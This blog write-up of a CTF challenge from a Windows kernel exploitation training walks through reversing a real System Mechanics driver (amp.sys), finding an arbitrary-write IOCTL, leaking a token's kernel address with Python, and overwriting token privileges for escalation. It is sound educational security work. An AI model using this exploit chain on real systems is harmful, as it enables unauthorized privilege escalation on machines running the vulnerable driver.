This post describes the blind exploitation of a known driver vulnerability in the context of @HackSysTeam’s Advanced Windows Kernel Exploitation training given at NorthSec 2019 in Montreal. Skip to the conclusion for a step-by-step summary of the exploit without spoiling the solution.

The full exploit code can be found on my GitHub

Introduction

Last week I attended NorthSec 2019 and was fortunate enough to take part in the Advanced Windows Kernel Exploitation training offered by HackSysTeam. The course was overall very pleasant and covered foundational kernel space concepts all the way up to advanced mitigation bypasses and exploitation. The material was extremely well presented and explained, making it easy to follow along.

The instructors also ran a mini CTF “competition” (which I may have taken a bit too seriously!) in parallel to the training to provide an environment in which to put the attendees’ newly acquired knowledge to the test. The track had increasingly difficult challenges that culminated in exploiting a real driver without any prior knowledge of its internals. While nobody solved it during the training, I could not let go and decided that I would finish it no matter what.

In this article I’ll try to give a detailed account of each step taken along the way to get a fully working exploit.

NOTE: For brevity I have only given decompiled and slightly cleaned up code listings in this post, but I have included the function addresses for those who want to look at the binary or assembly listings.

Recon

The CTF challenge description only mentions a System Mechanics driver to exploit, but does not give any additional information about how to interact with it, leaving it up to the participant to figure out the where, what, and how. Thankfully, drivers ampse.sys and amp.sys are provided, meaning that the driver to exploit is likely one of those.

The first step is thus to set up a VM, install the program, and take a look at the installed drivers using a tool called WinObj. After confirming that the drivers are indeed present, it’s important to identify which driver exposes functionality to userland. Here, it’s helpful to know that all kernel drivers are required to create a Device in order to expose any kind of functionality to the outside world, including other kernel drivers. This means it’s easy to spot the device using WinObj.

Permissions on the AMP device

Identifying the IOCTL Handler

Driver objects in Windows expose a limited number of I/O Request Packet (IRP) major function slots, which act as a low-level callback interface for specific events that occur in the system. A few examples include IRP_MJ_CREATE and IRP_MJ_CLOSE. From a userland perspective, the interesting one is IRP_MJ_DEVICE_CONTROL, a generic packet that carries an operation code called an I/O control code, or IOCTL for short. Without diving too much into internals, this allows the driver to expose custom functionality that user-mode code can call through the Windows DeviceIoControl API, as long as it can acquire a handle to the driver’s device.

Since the IRP table must be populated before returning from the DriverEntry (the equivalent of main for kernel drivers), it’s relatively straightforward to locate the IOCTL handling routine and thus identify exposed IOCTLs by reversing the driver from its entry point.

One way to do that is to use Ghidra and locate calls to IoCreateDevice, which both reveals the device name as well as the general location where the IRP handler functions are bound.

// FUN_2cfe0
ulonglong CreateDevice(longlong DriverObject)
{
   // ...
   if (g_DeviceHandle != 0) {
   RtlInitUnicodeString(local_30,L"\\Device\\AMP");
   RtlInitUnicodeString(local_20,L"\\DosDevices\\AMP");
   local_48 = IoCreateSymbolicLink(local_20,local_30);
   if (-1 < local_48) {
       *(DriverObject + 0x70) = 0x2c8b0;
       *(DriverObject + 0x80) = 0x2c8b0;
       *(DriverObject + 0xe0) = 0x2c580; // <-- IOCTL handler address
       *(DriverObject + 0xe8) = 0x2ce80;
       g_call_table = ExAllocatePool(0,0x98);
       if (g_call_table == 0x0) {
           local_48 = 0xc000009a;
       } else {
          // This call table will come in handy later
          *g_call_table = 9;
          *(g_call_table + 2) = 0x2cba0;
          g_call_table[4] = 0x18;
          *(g_call_table + 6) = 0x2cb20;
          g_call_table[8] = 0x10;
          *(g_call_table + 10) = 0x2c960;
          g_call_table[0xc] = 0x28;
          *(g_call_table + 0xe) = 0x2c850;
          g_call_table[0x10] = 8;
          *(g_call_table + 0x12) = 0x2c7f0;
          g_call_table[0x14] = 8;
          *(g_call_table + 0x16) = 0x18d20;
          g_call_table[0x18] = 0x20;
          *(g_call_table + 0x1a) = 0x2c510;
          g_call_table[0x1c] = 0;
          *(g_call_table + 0x1e) = 0x2c360;
          g_call_table[0x20] = 0x20;
          *(g_call_table + 0x22) = 0x2c460;
          g_call_table[0x24] = 8;
          uVar2 = store_call_table();
          local_48 = uVar2;
          if (-1 < local_48) {
              local_48 = 0;
          }
       }
    }
    // ...
}

We know the IOCTL handler must be at 0x2c580 because the IRP handler table is located at offset +0x70 in the _DRIVER_OBJECT and IRP_MJ_DEVICE_CONTROL is defined as 14 according to MagNumDb.

1: kd> dt _DRIVER_OBJECT
nt!_DRIVER_OBJECT
   +0x000 Type             : Int2B
   +0x002 Size             : Int2B
   +0x008 DeviceObject     : Ptr64 _DEVICE_OBJECT
   ... snip ...
   +0x070 MajorFunction    : [28] Ptr64     long
       // [0]  at +0x70 + (8 * 0)
       // ...
       // [14] at +0x70 + (8 * 0n14) = 0xe0
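The offset arithmetic can be double-checked with a few lines of Python. This is only a sketch: the 0x70 base and the 8-byte pointer size come from the WinDbg output above (64-bit Windows), the IRP_MJ_* values are the ones defined in the WDK headers, and the helper name is made up for illustration.

```python
# Offset of MajorFunction inside _DRIVER_OBJECT on 64-bit Windows (from the dt output).
MAJOR_FUNCTION_OFFSET = 0x70
POINTER_SIZE = 8

# Major function codes as defined in the WDK headers.
IRP_MJ = {
    "IRP_MJ_CREATE": 0x00,
    "IRP_MJ_CLOSE": 0x02,
    "IRP_MJ_DEVICE_CONTROL": 0x0E,
    "IRP_MJ_INTERNAL_DEVICE_CONTROL": 0x0F,
}

def major_function_slot(code):
    """Return the byte offset of MajorFunction[code] in _DRIVER_OBJECT."""
    return MAJOR_FUNCTION_OFFSET + POINTER_SIZE * code

if __name__ == "__main__":
    for name, code in IRP_MJ.items():
        print("%-32s -> +0x%x" % (name, major_function_slot(code)))
```

Under these assumptions, the four offsets the decompiled code writes to (0x70, 0x80, 0xe0 and 0xe8) line up with the create, close, device control and internal device control slots.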

The handler function is fairly simple and has a single IOCTL check instead of the expected switch statement:

// FUN_2c580
ulonglong HandleIOCTL(undefined8 irp,longlong irpsp)
{
    // ...

    *(irpsp + 0x38) = 0;
    device_io_ctl = *(irpsp + 0xb8);

    // This seems to be the only handled IOCTL
    if (*(device_io_ctl + 0x18) == 0x226003) {
        inSize = *(device_io_ctl + 0x10);
        inData = *(device_io_ctl + 0x20);
        is32bit = IoIs32bitProcess();
        res = Handle226003(is32bit,inData,inSize);
        ret = res;
    }
    else {
        ret = 0xc0000010;
    }
    *(irpsp + 0x30) = ret;

    IofCompleteRequest(irpsp,0);
    return ret;
}

This bit of code gives us two useful bits of knowledge:

The IOCTL code: 0x226003
The address of the handler for this IOCTL
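The IOCTL code itself carries more information than it first appears. As a rough sketch, the snippet below splits 0x226003 into its fields following the standard CTL_CODE bit layout (device type, required access, function number, transfer method). The function name is hypothetical and not part of the exploit.

```python
def decode_ioctl(code):
    """Split a Windows IOCTL code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,  # 0x22 is FILE_DEVICE_UNKNOWN
        "access": (code >> 14) & 0x3,          # 1 is FILE_READ_ACCESS
        "function": (code >> 2) & 0xFFF,       # vendor functions start at 0x800
        "method": code & 0x3,                  # 3 is METHOD_NEITHER
    }

if __name__ == "__main__":
    for field, value in decode_ioctl(0x226003).items():
        print("%-12s 0x%x" % (field, value))
```

The transfer method decodes to 3, which is METHOD_NEITHER. With that method the I/O manager hands the raw user-mode pointer to the driver without buffering it, which fits with the handler reading the input pointer straight out of the stack location at +0x20.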

Finding the Vulnerability

During the training, one of the CTF flags was to write a fuzzer to discover a crash. However, during the initial reversing effort to identify the IOCTL to fuzz, a quick look at the IOCTL handler was enough to notice a vulnerability. Ghidra’s (free) decompiler is powerful enough to make it almost trivial to find what we are looking for.

// FUN_166d0
undefined8 Handle226003(char is32bit,undefined8 *userBuf,uint size)
{
    // ...

    if (is32bit == 0) {
        if (size < 0x18) {
            return 0xc0000023;
        }
        dst = userBuf[2];
        opcode = *userBuf;
    }
    else { // This branch can be ignored (32-bit)
        // ...
    }

    if (pOpcodeTable == 0x0) {
        return 0xc0000001;
    }

    if (*pOpcodeTable <= opcode) {
      return 0xc000000d;
    }

    opcode = pOpcodeTable[opcode * 2 + 1];
    call_handler(&opcode,pCallTable);
    if (is32bit == 0) {
        // [!!!!] Function result written to user-controlled address!
        *dst = result;
        return 0;
    }
    // This part is never reached.
    *dst = result;
    return 0;
}

Indeed, the user-controlled pointer is being dereferenced and written to in kernel-land. This effectively means that the caller is able to write anywhere in valid memory, including kernel memory, simply by passing a kernel address as the result pointer. Unfortunately, finding this vulnerability and exploiting it are two very different stories.

Crafting the Exploit

In this section I am omitting a lot of hours spent hunting dead ends. There are two main objectives here:

Figure out where to write
Figure out what to write

Despite the obviousness of those objectives, and having the vulnerability right in my face, it somehow took a lot longer than I’m comfortable admitting to connect the dots.

The general idea is that each process running in Windows is associated with an access token which determines what the process is allowed to do. The token is a complex data structure with a critical part that decides which actions a given process is allowed to perform:

1: kd> dt -r nt!_TOKEN
nt!_TOKEN
   +0x000 TokenSource      : _TOKEN_SOURCE
      +0x000 SourceName       : [8] Char
      +0x008 SourceIdentifier : _LUID
         +0x000 LowPart          : Uint4B
         +0x004 HighPart         : Int4B
      ... snip ...
      +0x040 Privileges       : _SEP_TOKEN_PRIVILEGES
         +0x000 Present          : Uint8B // Privileges to consider
         +0x008 Enabled          : Uint8B // Privileges that are granted
         +0x010 EnabledByDefault : Uint8B // Privileges granted to child processes
      ... snip ...

This so-called _SEP_TOKEN_PRIVILEGES structure, which resides at offset 0x40 of the token (on 64-bit Windows), is nothing more than a set of bitfields where 1 means that a privilege is granted and 0 means it isn’t. In other words, if one is able to write 0xffffffffffffffff to all three fields of the structure, the current process will have all permissions granted, and any child process will inherit those permissions.
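To make the write targets concrete, here is a small sketch that turns a token address into the three addresses that need to be overwritten. The offsets are taken from the dt output above. The function name and the example address are made up for illustration.

```python
# Offsets from the dt nt!_TOKEN output above (64-bit Windows).
PRIVILEGES_OFFSET = 0x40
FIELD_OFFSETS = {
    "Present": 0x00,
    "Enabled": 0x08,
    "EnabledByDefault": 0x10,
}

def privilege_field_addresses(token_address):
    """Return the kernel address of each _SEP_TOKEN_PRIVILEGES field."""
    base = token_address + PRIVILEGES_OFFSET
    return {name: base + offset for name, offset in FIELD_OFFSETS.items()}

if __name__ == "__main__":
    # Hypothetical token address, only here to show the arithmetic.
    for name, address in privilege_field_addresses(0xFFFF8A0012345000).items():
        print("%-17s 0x%016x" % (name, address))
```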

Great, let’s do it!… Wait… where is this token in memory?

No Read? No Problem!

After spending a long time trying to find a read primitive in order to bypass kASLR, I finally had a bit of a revelation thinking back on the training material: it’s possible to use userland APIs to leak kernel addresses. One such call is NtQuerySystemInformation. Some of the system information classes are not very well documented, but after fiddling around for a while I managed to get what I wanted: a way to figure out exactly where the token is located. Explaining it in text would be too long-winded, so instead here is the Python snippet that leaks the address of the current process’ token in kernel land:

import sys
from ctypes import windll, byref, c_ubyte
from ctypes.wintypes import DWORD, HANDLE

kernel32 = windll.kernel32
advapi32 = windll.advapi32
ntdll = windll.ntdll

TOKEN_QUERY = 0x0008
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
SystemExtendedHandleInformation = 64

def get_token_address():
    hProc = HANDLE(kernel32.GetCurrentProcess())
    pid = kernel32.GetCurrentProcessId()
    h = HANDLE()
    res = advapi32.OpenProcessToken(hProc, TOKEN_QUERY, byref(h))
    if res == 0:
        print('[-] Error getting token handle')
        sys.exit(-1)

    # Grow the buffer until the call stops reporting a length mismatch.
    q = STATUS_INFO_LENGTH_MISMATCH
    out = DWORD(0)
    sz = 0
    while q == STATUS_INFO_LENGTH_MISMATCH:
        sz += 0x1000
        handle_info = (c_ubyte * sz)()
        # ctypes returns NTSTATUS as a signed int, so mask it before comparing.
        q = ntdll.NtQuerySystemInformation(
                SystemExtendedHandleInformation,
                byref(handle_info),
                sz,
                byref(out)
            ) & 0xFFFFFFFF

    # Parse handle_info to retrieve handles for the current PID.
    # find_handles is a helper from the full exploit that yields
    # (pid, object address, handle value) tuples.
    handles = find_handles(pid, handle_info)
    hToken = [x for x in handles if x[0] == pid and x[2] == h.value]

    if len(hToken) != 1:
        return None
    return hToken[0][1]

Without getting into the nitty-gritty, this code leaks the address of every kernel object associated with a handle, then looks through the results to identify the access token handle that belongs to the current process. Once it is found, the code extracts the kernel-land address of the token.
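The find_handles helper is not shown in the snippet, so here is one possible sketch of it. It assumes the commonly published (but not officially documented) 64-bit layout of SYSTEM_HANDLE_INFORMATION_EX: a 16-byte header holding the handle count, followed by 40-byte entries. The tuple order (pid, object address, handle value) is inferred from how the results are indexed in the snippet. The actual helper in the full exploit may well differ.

```python
import struct

# Assumed 64-bit layout of SYSTEM_HANDLE_INFORMATION_EX (undocumented).
HEADER = struct.Struct("<QQ")       # NumberOfHandles, Reserved
ENTRY = struct.Struct("<QQQIHHII")  # Object, UniqueProcessId, HandleValue,
                                    # GrantedAccess, CreatorBackTraceIndex,
                                    # ObjectTypeIndex, HandleAttributes, Reserved

def find_handles(pid, handle_info):
    """Return (pid, object_address, handle_value) for every handle owned by pid."""
    raw = bytes(handle_info)  # accepts bytes or a ctypes byte array
    count, _reserved = HEADER.unpack_from(raw, 0)
    results = []
    for i in range(count):
        offset = HEADER.size + i * ENTRY.size
        if offset + ENTRY.size > len(raw):
            break  # truncated buffer, stop instead of reading past the end
        obj, owner_pid, handle = ENTRY.unpack_from(raw, offset)[:3]
        if owner_pid == pid:
            results.append((owner_pid, obj, handle))
    return results
```

Parsing with struct rather than ctypes structures keeps the sketch short and lets it be exercised against a hand-built buffer on any platform.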

Write Limitations Require Creativity

Okay, after all of this effort and trouble, we still have one major hurdle: The write that we have allows us to write anywhere, but does not allow us to control the value of the write. This part takes a bit of additional reversing to identify a code path in the driver that will return a value as close as possible to 0xffffffffffffffff.

First, it’s important to understand the structure of the buffer being passed into the IOCTL:

+00 4B opcode [0..8]
+04 4B padding
+08 8B pointer to arguments buffer
+10 8B pointer to result buffer

The opcode determines which handler is called in call_handler as shown above. The padding is unused and can be ignored. Next, the arguments field contains a pointer to a buffer which will be read by the driver to retrieve the handler’s arguments. Lastly, the result field contains a pointer to the memory location where the driver will write its result.
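As a minimal sketch, the layout described above can be packed with Python’s struct module. The function and variable names are hypothetical, and the pointer values in the example are placeholders rather than real addresses.

```python
import struct

# opcode (4B), padding (4B), arguments pointer (8B), result pointer (8B)
REQUEST = struct.Struct("<IIQQ")

def build_request(opcode, args_ptr, result_ptr):
    """Pack the 0x18-byte input buffer expected by the 64-bit code path."""
    return REQUEST.pack(opcode, 0, args_ptr, result_ptr)

if __name__ == "__main__":
    # Placeholder pointers: the result pointer is where the driver will write.
    request = build_request(8, 0, 0xFFFF8A0012345040)
    print(len(request), request.hex())
```

The packed buffer is exactly 0x18 bytes long, which is the minimum size the handler accepts on the 64-bit path.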

There are 9 handlers in total (opcodes 0 through 8). The idea is to find one that returns a suitable value into the result buffer. Digging into each opcode handler that gets assigned to g_call_table, two of them stand out: 0x5 and 0x8. I’ve decided to go with 0x8 because the decompiled output is shorter:

// FUN_2c460
ulonglong opcode_8(int *param_1)
{
    // ...

    retval = 0;
    if (param_1 == 0x0) {
        retval = 0xfffffffe; // if param_1 is NULL.
    } else {
        // ... some logic and processing ...
    }

    // ...
    return retval;
}

So all we need to do is send an arguments buffer that has a NULL value for the first parameter and the driver should write 0xfffffffe to the location of our choice. This can be triggered multiple times to enable almost all privileges in the current process’ token.
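To see why 0xfffffffe is good enough, the following sketch checks which privilege bits it sets. The bit positions are the privilege LUID values from the Windows headers (for example, SeDebugPrivilege is 20). It assumes the value ends up in the low 32 bits of each 64-bit field with the upper half left at zero, which is an assumption on my part and not something verified against the driver here.

```python
# A few privilege LUID values from the Windows headers, used as bit positions.
PRIVILEGE_BITS = {
    "SeTcbPrivilege": 7,
    "SeLoadDriverPrivilege": 10,
    "SeDebugPrivilege": 20,
    "SeImpersonatePrivilege": 29,
    "SeCreateSymbolicLinkPrivilege": 35,
}

def enabled_privileges(mask):
    """Return the names of the listed privileges whose bit is set in mask."""
    return sorted(name for name, bit in PRIVILEGE_BITS.items() if mask & (1 << bit))

if __name__ == "__main__":
    for name in enabled_privileges(0xFFFFFFFE):
        print(name)
```

Under that assumption, every privilege with a bit position between 1 and 31 is covered, including the debug, impersonate, load driver and TCB privileges. Only the handful that live above bit 31 are missed, hence "almost all".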

…

Victory!

Full Exploit Chain

To summarize the attack, the following steps are taken:

Open the token in read-only within userland to get a handle on it.
Get the current process ID
Use NtQuerySystemInformation to leak kernel addresses of all objects with a handle.
Find the information entry for the token handle in the current process and get the kernel address. This bypasses kASLR.
Build an IOCTL request for the vulnerable driver that will return 0xfffffffe and set the output buffer address to point to the token privileges.
Repeat the previous step with all token privilege fields.
Spawn a child process which will inherit the token permissions.

The nice thing about this exploit is that it does not require any code execution, and therefore the only mitigation that needs to be bypassed is kASLR, which is trivial at medium integrity-level (but a completely different beast at low IL.)

Successful Exploitation

Conclusion

Well, this was a long-winded article. If you’ve stuck with it this far, hopefully the write-up was clear enough to follow along. This exploit required a bit of creativity because of the restricted control over what was being written. I must admit that I initially spent a lot of time trying to get a true arbitrary write-what-where primitive and an arbitrary read.

The current exploit is limited in that it relies on calls that are only available at medium integrity level in order to elevate privileges. Despite that, it was a great introduction to real-life kernel exploitation and reversing.

segfault

by alxbl

Exploiting an Arbitrary Write to Escalate Privileges